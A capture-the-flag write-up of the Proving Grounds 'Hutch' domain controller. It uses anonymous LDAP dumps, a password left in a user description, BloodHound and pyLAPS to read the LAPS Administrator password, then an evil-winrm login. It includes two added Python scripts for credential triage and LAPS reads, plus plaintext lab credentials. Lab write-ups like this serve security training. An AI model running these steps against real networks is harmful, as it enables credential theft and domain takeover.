Hutch is a short, intermediate-rated Proving Grounds machine: a single Windows domain controller. Anonymous LDAP binds were allowed, so I could enumerate the domain users and pull a username and password pair out of an account's description field. Further enumeration with BloodHound showed that this user held the ReadLAPSPassword right over the DC, which gave up the Administrator password and a WinRM login.
To begin, I started with my tried and true nmap scanning command.
```
nmap -sC -sV -p- --min-rate 10000 192.168.213.122
```
![[Hack The Box/Alert/NmapScan.png]]
Judging from the open ports, this looks like a Windows domain controller named HUTCHDC. I took inventory of the ports of interest:
port 80 - http, standard IIS httpd 10.0
port 88 - kerberos
port 389 - LDAP
port 445 - SMB
port 5985 - WinRM
I'll enumerate these ports in order and move forward from there, starting with port 80.
![[IISDefault.PNG]]
It appears to be just the IIS default page. I'll come back and enumerate it further if I find nothing downstream. For now I'll move on to LDAP to check for users. First I use ldapsearch with an anonymous bind (-x) to pull the naming contexts, which tells me the domain's base DN.
```
ldapsearch -H ldap://192.168.213.122 -x -s base namingcontexts
```
![[ldapnamingcontexts.PNG]]
I'll go ahead and add the domain name from the naming contexts (hutch.offsec) to my hosts file before I forget.
![[Proving Grounds/Hutch/HostsFile.PNG]]
With the discovered base DN I can attempt a full anonymous dump of the directory.
```
ldapsearch -H ldap://192.168.213.122 -x -b "DC=hutch,DC=offsec"
```
![[ldapspill.PNG]]
I was stunned to see a spill of information! Instead of going through this by hand, I'm going to use ldapdomaindump to organize the findings into easy-to-parse JSON and HTML files. The credentials in the command below are the ones I recovered from the dump in the next step; since the server accepted an anonymous bind above, ldapdomaindump also works with -u and -p omitted.
```
ldapdomaindump -u hutch.offsec\\fmcsorley -p 'CrabSharkJellyfish192' 192.168.213.122 -o ldap/
```
![[ldapdump.PNG]]
Opening domain_users.html, I can clearly see that the user fmcsorley has a very revealing description:
![[domainusers.PNG]]
"Password set to CrabSharkJellyfish192 at user's request. Please change on next login."
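Reading every description by eye does not scale past a small domain. The script below is an added example (not part of the original writeup or of ldapdomaindump) that triages the domain_users.json ldapdomaindump writes, flagging free-text attributes that mention a credential and pulling out tokens that look like passwords. It assumes the dump is a JSON list of entries each holding an "attributes" map with list-valued attributes, which is how ldapdomaindump lays out its JSON; check the keys against your own dump. The sample dump is constructed: the fmcsorley description is the one from this box, the other two entries are made up.

```python
"""Triage an ldapdomaindump domain_users.json for credentials left in
free-text attributes (description/info/comment).

Added example, not code from the writeup or from ldapdomaindump.
"""
import json
import re

# Words that suggest the text is talking about a credential.
KEYWORD = re.compile(
    r"\b(pass(?:word|wd|phrase)?|pwd|pw|cred(?:ential)?s?|secret)\b", re.I)

# Free-text attributes where admins tend to park "temporary" passwords.
TEXT_ATTRS = ("description", "info", "comment")

# Punctuation that is sentence structure rather than part of a secret.
PUNCT = "()[]{}<>.,;:\"'"
# Symbols commonly found inside passwords; '-' and '_' are left out because
# they are just as common in hostnames and account names.
PW_SYMBOLS = set("!@#$%^&*+=/\\|~")


def _as_list(value):
    """ldapdomaindump writes attributes as lists; tolerate scalars too."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _clean(token):
    return token.strip(PUNCT)


def looks_like_secret(token):
    """Heuristic: 8+ chars mixing letters with digits or password symbols is
    far more likely a password than a dictionary word or an IP address."""
    t = _clean(token)
    if len(t) < 8:
        return False
    has_alpha = any(c.isalpha() for c in t)
    has_digit = any(c.isdigit() for c in t)
    has_symbol = any(c in PW_SYMBOLS for c in t)
    return has_alpha and (has_digit or has_symbol)


def candidate_secrets(text):
    return [_clean(t) for t in text.split() if looks_like_secret(t)]


def find_credential_descriptions(dump_json):
    """One finding per user/attribute that mentions a credential. 'candidates'
    may be empty: a keyword hit with no obvious token still deserves a read."""
    findings = []
    for entry in json.loads(dump_json):
        attrs = entry.get("attributes", {})
        sam = (_as_list(attrs.get("sAMAccountName")) or ["?"])[0]
        for attr in TEXT_ATTRS:
            for text in _as_list(attrs.get(attr)):
                if not KEYWORD.search(text):
                    continue
                findings.append({"sam": sam, "attribute": attr, "text": text,
                                 "candidates": candidate_secrets(text)})
    return findings


# Constructed sample in the ldapdomaindump shape. The fmcsorley description is
# the real one from the box; the other two entries are invented for the example.
SAMPLE_DUMP = json.dumps([
    {"dn": "CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec",
     "attributes": {"sAMAccountName": ["fmcsorley"],
                    "description": ["Password set to CrabSharkJellyfish192 at "
                                    "user's request. Please change on next login."]}},
    {"dn": "CN=svc_backup,CN=Users,DC=hutch,DC=offsec",
     "attributes": {"sAMAccountName": ["svc_backup"],
                    "description": ["Service account for nightly backups"]}},
    {"dn": "CN=Contractor,CN=Users,DC=hutch,DC=offsec",
     "attributes": {"sAMAccountName": ["contractor"],
                    "info": ["Contractor account, pw: Summer2020! (temporary)"]}},
])

if __name__ == "__main__":
    for f in find_credential_descriptions(SAMPLE_DUMP):
        print(f"{f['sam']:<12} {f['attribute']:<12} {f['candidates']}  <- {f['text']}")
```

Point it at a real dump with `find_credential_descriptions(open("ldap/domain_users.json").read())`. The token heuristic will also catch things like hostnames with digits, so treat the output as a reading list rather than a password list.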
Using that information I can do some authenticated enumeration and check whether the user can log in over WinRM. I would usually check whether any other users share the same password, but since they are all just "Domain Users" in this case, I'm going to push ahead with Freddy (fmcsorley).
First I checked for Kerberoastable accounts (the -k flag makes impacket authenticate with Kerberos rather than NTLM, falling back to the supplied password when no ticket is in the ccache).
```
impacket-GetUserSPNs 'hutch.offsec/fmcsorley:CrabSharkJellyfish192' -k -dc-ip 192.168.213.122
```
This turned up nothing.
![[kerberoast.PNG]]
Next I checked the shares Freddy has access to using crackmapexec.
```
crackmapexec smb 192.168.213.122 -u fmcsorley -p 'CrabSharkJellyfish192' --shares
```
![[shares.PNG]]
After going through every readable file on those shares, I found nothing interesting.
Lastly I tried logging into WinRM with the same credentials.
![[WInrmFailure.PNG]]
But that failed too.
Since I'm working with a domain controller, I decided to run BloodHound to get an overview of what I'm dealing with. I cloned the BloodHound.py repository and ran the collector with Freddy's credentials, pointing -ns at the DC so it resolves names through the domain's DNS.
```
./bloodhound.py -u fmcsorley -p 'CrabSharkJellyfish192' -d hutch.offsec -c All -ns 192.168.213.122
```
![[bloodhoundpython.PNG]]
I then zipped up the results.
![[zippy.PNG]]
Then I fired up BloodHound and loaded the zip.
![[zippsLoad.PNG]]
Next, I went straight to "Find Shortest Paths to Domain Admins" under the Analysis tab, and my next step became very clear...
![[readlapsblood.PNG]]
A cool thing about BloodHound is the abuse information you get by clicking the edge and then the question mark. The modal shows the different ways to abuse the permission from both Linux and Windows; I'm interested in how to abuse it from Linux. According to the overview:
"The user FMCSORLEY@HUTCH.OFFSEC has the ability to read the password set by Local Administrator Password Solution (LAPS) on the computer HUTCHDC.HUTCH.OFFSEC.
The local administrator password for a computer managed by LAPS is stored in the confidential LDAP attribute, "ms-mcs-AdmPwd"."
And according to the Linux abuse tab:
"Sufficient control on a computer object is abusable when the computer's local admin account credential is controlled with LAPS. The clear-text password for the local administrator account is stored in an extended attribute on the computer object called ms-Mcs-AdmPwd.
[pyLAPS](https://github.com/p0dalirius/pyLAPS) can be used to retrieve LAPS passwords:"
```
pyLAPS.py --action get -d "DOMAIN" -u "ControlledUser" -p "ItsPassword"
```
![[abuselaps.PNG]]
How convenient that there is a tool to do just this from the safety of my own shell. I downloaded the script from GitHub with wget:
```
wget https://raw.githubusercontent.com/p0dalirius/pyLAPS/main/pyLAPS.py
```
![[wget.PNG]]
Then I ran it as BloodHound specified:
```
python pyLAPS.py --action get -d "hutch.offsec" -u "fmcsorley" -p "CrabSharkJellyfish192"
```
![[lapspassword.PNG]]
Amazing, it's that easy! As a side note, I learned later that crackmapexec can do this too, using its --laps flag.
![[crackmaplaps.PNG]]
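To show what pyLAPS and the crackmapexec option are doing under the hood, here is an added example (not code from the writeup, pyLAPS or crackmapexec) that performs the same LDAP read with ldap3 and parses the result. Legacy LAPS keeps the cleartext password in ms-Mcs-AdmPwd and its expiry as a Windows FILETIME in ms-Mcs-AdmPwdExpirationTime; because the password attribute is confidential, the DC returns it only for computers the caller has the right over and silently omits it otherwise, so the script separates "readable" from "withheld" rather than treating a missing value as "no LAPS". The live query needs the ldap3 package and is not run here; the domain, user, password and DC address are the ones from this box, and the result entries (including the password value) are constructed.

```python
"""Read legacy LAPS (ms-Mcs-AdmPwd) passwords over LDAP as a principal that
holds ReadLAPSPassword, and parse what comes back.

Added example, not code from the writeup, pyLAPS or crackmapexec.
"""
from datetime import datetime, timedelta, timezone

# Legacy LAPS stores the cleartext local-admin password and its expiry on the
# computer object. ms-Mcs-AdmPwd is a confidential attribute: the DC only
# returns it to principals with the right over that computer and otherwise
# returns the computer with the attribute missing.
LAPS_PWD_ATTR = "ms-Mcs-AdmPwd"
LAPS_EXP_ATTR = "ms-Mcs-AdmPwdExpirationTime"
ATTRIBUTES = ["dNSHostName", LAPS_PWD_ATTR, LAPS_EXP_ATTR]
COMPUTER_FILTER = "(objectCategory=computer)"

# Windows FILETIME: 100 ns ticks since 1601-01-01 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def domain_to_base_dn(domain):
    """'hutch.offsec' -> 'DC=hutch,DC=offsec'"""
    return ",".join(f"DC={part}" for part in domain.split("."))


def filetime_to_datetime(filetime):
    """Convert the FILETIME integer LAPS stores to an aware UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=int(filetime) // 10)


def _first(value):
    """ldap3 returns lists without schema info and scalars with it."""
    if isinstance(value, list):
        return value[0] if value else None
    return value


def summarize_laps(entries, now=None):
    """Split computers into those whose LAPS password was returned and those
    where the attribute was withheld (no right over that computer, or the
    computer is not LAPS-managed at all)."""
    now = now or datetime.now(timezone.utc)
    readable, hidden = [], []
    for entry in entries:
        attrs = entry.get("attributes", {})
        host = _first(attrs.get("dNSHostName")) or entry.get("dn")
        password = _first(attrs.get(LAPS_PWD_ATTR))
        expiry = _first(attrs.get(LAPS_EXP_ATTR))
        if not password:
            hidden.append(host)
            continue
        expires = filetime_to_datetime(expiry) if expiry else None
        readable.append({
            "host": host,
            "password": password,
            "expires": expires,
            # A LAPS password past its expiry still works until the client's
            # next GPO refresh actually rotates it, so this is a hint only.
            "past_expiry": bool(expires and expires < now),
        })
    return readable, hidden


def fetch_laps_entries(dc_ip, domain, user, password):
    """Live LDAP query (not exercised here): NTLM bind as the controlled user,
    then read the LAPS attributes of every computer in the domain."""
    import ldap3  # imported lazily so the offline helpers need no dependency

    server = ldap3.Server(dc_ip, get_info=ldap3.NONE)
    conn = ldap3.Connection(server, user=f"{domain}\\{user}", password=password,
                            authentication=ldap3.NTLM, auto_bind=True)
    conn.search(domain_to_base_dn(domain), COMPUTER_FILTER, attributes=ATTRIBUTES)
    return [{"dn": r["dn"], "attributes": r["attributes"]}
            for r in conn.response if r.get("type") == "searchResEntry"]


# Constructed search result: the DC with a readable (made-up) password and a
# second, invented computer whose attribute the server withheld.
SAMPLE_ENTRIES = [
    {"dn": "CN=HUTCHDC,OU=Domain Controllers,DC=hutch,DC=offsec",
     "attributes": {"dNSHostName": ["HUTCHDC.hutch.offsec"],
                    LAPS_PWD_ATTR: ["ExamplePassw0rd!"],
                    LAPS_EXP_ATTR: ["132539328000000000"]}},  # 2021-01-01 UTC
    {"dn": "CN=WS01,CN=Computers,DC=hutch,DC=offsec",
     "attributes": {"dNSHostName": ["WS01.hutch.offsec"]}},
]

if __name__ == "__main__":
    # Against the box: fetch_laps_entries("192.168.213.122", "hutch.offsec",
    #                                     "fmcsorley", "CrabSharkJellyfish192")
    readable, hidden = summarize_laps(SAMPLE_ENTRIES)
    for r in readable:
        print(f"{r['host']}: {r['password']} (expires {r['expires']:%Y-%m-%d}, "
              f"past expiry: {r['past_expiry']})")
    print("no readable LAPS password:", ", ".join(hidden))
```

The split between readable and withheld computers is the useful bit for a pentester: if every computer comes back without ms-Mcs-AdmPwd, the account you are using lacks the right, which is a different finding from LAPS not being deployed.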
Now that I have the Administrator password, it should be as simple as using it to WinRM into the DC with Evil-WinRM. Because HUTCHDC is a domain controller, the "local" Administrator account that LAPS manages here is the domain's built-in Administrator, so this password is domain admin, not just local admin on one box.
```
evil-winrm -i 192.168.213.122 -u administrator -p 'x/3hy0+U7ZTOS+'
```
![[logedinasadmin.PNG]]
And I can grab the proof.txt!
![[prooftxt.PNG]]
This was a very satisfying machine, Thanks for reading!